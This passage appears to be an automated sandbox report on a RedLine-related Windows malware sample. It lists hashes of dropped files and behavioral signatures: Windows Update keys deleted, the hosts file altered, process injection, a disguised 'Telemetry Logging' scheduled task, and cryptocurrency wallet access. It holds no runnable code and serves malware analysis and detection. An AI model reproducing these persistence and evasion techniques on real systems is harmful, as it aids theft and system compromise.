memory/1316-98-0x000007FEF38A0000-0x000007FEF43FD000-memory.dmp
memory/1316-99-0x0000000002724000-0x0000000002727000-memory.dmp
memory/1316-100-0x0000000002724000-0x0000000002727000-memory.dmp
memory/1316-101-0x000000000272B000-0x000000000274A000-memory.dmp
memory/576-102-0x0000000000000000-mapping.dmp
memory/832-104-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | b0b2ca0d939c43a29aca0a7955aaf8cf |
| SHA1 | 1c0ca08a0f45f44a41c0445586dfafe0c4bd1e08 |
| SHA256 | 6b42769fc919ed9a0f020937f2ddf39c71ccec3a294e481d6ce157fbd0321307 |
| SHA512 | 003a66973933dfe266b108dd50645a8b9c9522e4522415858de39106567aa661771411fb6a62401b2fb32a0e8da63e385cf17b81980f420bce4ba0de5147a925 |
memory/1924-107-0x0000000000000000-mapping.dmp
memory/1484-106-0x000007FEF4370000-0x000007FEF4D93000-memory.dmp
memory/1704-109-0x0000000000000000-mapping.dmp
memory/1484-108-0x000007FEF3810000-0x000007FEF436D000-memory.dmp
memory/796-110-0x0000000000000000-mapping.dmp
memory/1484-111-0x00000000026F4000-0x00000000026F7000-memory.dmp
memory/1936-112-0x0000000000000000-mapping.dmp
memory/1184-114-0x0000000000000000-mapping.dmp
memory/1684-115-0x0000000000000000-mapping.dmp
memory/1624-116-0x0000000000000000-mapping.dmp
memory/1736-117-0x0000000000000000-mapping.dmp
memory/1484-113-0x000000001B730000-0x000000001BA2F000-memory.dmp
memory/1048-118-0x0000000001E30000-0x0000000002334000-memory.dmp
memory/944-119-0x0000000000000000-mapping.dmp
memory/1484-120-0x00000000026FB000-0x000000000271A000-memory.dmp
memory/1484-121-0x00000000026F4000-0x00000000026F7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/1980-123-0x0000000140001938-mapping.dmp
memory/1584-124-0x0000000000000000-mapping.dmp
memory/1680-125-0x0000000000000000-mapping.dmp
memory/1584-129-0x000007FEF38A0000-0x000007FEF43FD000-memory.dmp
memory/1584-130-0x0000000077460000-0x0000000077609000-memory.dmp
memory/1708-131-0x0000000001006000-0x0000000001017000-memory.dmp
memory/1048-132-0x0000000002340000-0x000000000247D000-memory.dmp
memory/1584-133-0x00000000012A4000-0x00000000012A7000-memory.dmp
memory/1680-134-0x0000000071660000-0x0000000071C0B000-memory.dmp
memory/1584-135-0x00000000012AB000-0x00000000012CA000-memory.dmp
memory/1584-137-0x0000000077460000-0x0000000077609000-memory.dmp
memory/1584-136-0x0000000077240000-0x000000007735F000-memory.dmp
memory/108-139-0x0000000140002314-mapping.dmp
memory/108-138-0x0000000140000000-0x0000000140029000-memory.dmp
memory/108-141-0x0000000140000000-0x0000000140029000-memory.dmp
memory/1584-142-0x00000000012AB000-0x00000000012CA000-memory.dmp
memory/108-143-0x0000000077460000-0x0000000077609000-memory.dmp
memory/108-145-0x0000000077240000-0x000000007735F000-memory.dmp
memory/1584-144-0x0000000077240000-0x000000007735F000-memory.dmp
memory/1584-146-0x0000000077460000-0x0000000077609000-memory.dmp
memory/420-147-0x0000000000720000-0x0000000000741000-memory.dmp
memory/108-149-0x0000000140000000-0x0000000140029000-memory.dmp
memory/420-151-0x000007FEBF5B0000-0x000007FEBF5C0000-memory.dmp
memory/484-160-0x000007FEBF5B0000-0x000007FEBF5C0000-memory.dmp
memory/464-158-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/464-156-0x000007FEBF5B0000-0x000007FEBF5C0000-memory.dmp
memory/108-153-0x0000000077460000-0x0000000077609000-memory.dmp
memory/420-152-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/484-162-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/420-164-0x00000000007F0000-0x0000000000817000-memory.dmp
memory/584-171-0x000007FEBF5B0000-0x000007FEBF5C0000-memory.dmp
memory/484-170-0x0000000000130000-0x0000000000151000-memory.dmp
memory/492-168-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/464-167-0x00000000001D0000-0x00000000001F7000-memory.dmp
memory/492-165-0x000007FEBF5B0000-0x000007FEBF5C0000-memory.dmp
memory/492-176-0x00000000002E0000-0x0000000000307000-memory.dmp
memory/484-174-0x0000000000160000-0x0000000000187000-memory.dmp
memory/584-173-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/584-181-0x0000000000580000-0x00000000005A7000-memory.dmp
memory/664-180-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/664-178-0x000007FEBF5B0000-0x000007FEBF5C0000-memory.dmp
memory/664-183-0x00000000003C0000-0x00000000003E7000-memory.dmp
memory/752-185-0x000007FEBF5B0000-0x000007FEBF5C0000-memory.dmp
memory/800-191-0x0000000000940000-0x0000000000967000-memory.dmp
memory/752-189-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/800-197-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/752-187-0x0000000000920000-0x0000000000947000-memory.dmp
memory/800-186-0x000007FEBF5B0000-0x000007FEBF5C0000-memory.dmp
memory/836-199-0x00000000008A0000-0x00000000008C7000-memory.dmp
memory/836-202-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/868-206-0x00000000009A0000-0x00000000009C7000-memory.dmp
memory/868-209-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/280-215-0x0000000001140000-0x0000000001167000-memory.dmp
memory/340-218-0x0000000001BF0000-0x0000000001C17000-memory.dmp
memory/340-223-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/1032-229-0x0000000000610000-0x0000000000637000-memory.dmp
memory/1032-231-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/1120-234-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/1188-239-0x0000000000150000-0x0000000000177000-memory.dmp
memory/1188-241-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/1256-245-0x0000000002B10000-0x0000000002B37000-memory.dmp
memory/1256-248-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/1836-251-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/1660-254-0x0000000000970000-0x0000000000997000-memory.dmp
memory/2008-259-0x0000000000200000-0x0000000000227000-memory.dmp
memory/1660-256-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/1680-262-0x0000000071660000-0x0000000071C0B000-memory.dmp
memory/1352-261-0x0000000000210000-0x0000000000237000-memory.dmp
memory/108-264-0x0000000000130000-0x0000000000157000-memory.dmp
memory/1352-263-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/280-267-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/1120-268-0x0000000001E50000-0x0000000001E77000-memory.dmp
memory/1836-269-0x0000000000550000-0x0000000000577000-memory.dmp
memory/2008-270-0x00000000374A0000-0x00000000374B0000-memory.dmp
memory/2024-271-0x0000000000130000-0x0000000000157000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/1800-277-0x0000000000000000-mapping.dmp
memory/292-289-0x0000000000000000-mapping.dmp
C:\Windows\System32\Tasks\Telemetry Logging
| MD5 | 19d49597c6c95a7c8f83c1efd4b08e8b |
| SHA1 | 09aade26360826bbff3a9ea5f9e1c6703b47645d |
| SHA256 | 17bea449cf008b43e977ed647028cfd50066ca3fb842d14ef596c2ef4e3cc243 |
| SHA512 | 32ad6906e225785ede1c66ab3f20d18287f5e2ba2a3f305a0c5019a9a32d4b83af5d6da3d9680b1e9c908aaa87d8bad8eae746c042dc98b73bbd98275008e329 |
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/1924-295-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/576-308-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-01-28 19:11
Reported
2023-01-28 19:14
Platform
win10v2004-20220812-en
Max time kernel
151s
Max time network
133s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3200 created 3288 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
| PID 3240 created 4416 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
| PID 4252 created 2736 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5076 created 900 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 5076 created 900 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 5076 created 900 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 5076 created 900 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 4408 created 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 4912 created 3288 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\system32\DllHost.exe |
| PID 4912 created 4416 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\system32\DllHost.exe |
| PID 4912 created 2736 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\system32\DllHost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SysApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | N/A |
Stops running service(s)
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Telemetry Logging | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3156 set thread context of 4832 | N/A | C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 3644 set thread context of 5080 | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 5076 set thread context of 4080 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\System32\dialer.exe |
| PID 4408 set thread context of 2644 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 28 Jan 2023 19:12:32 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
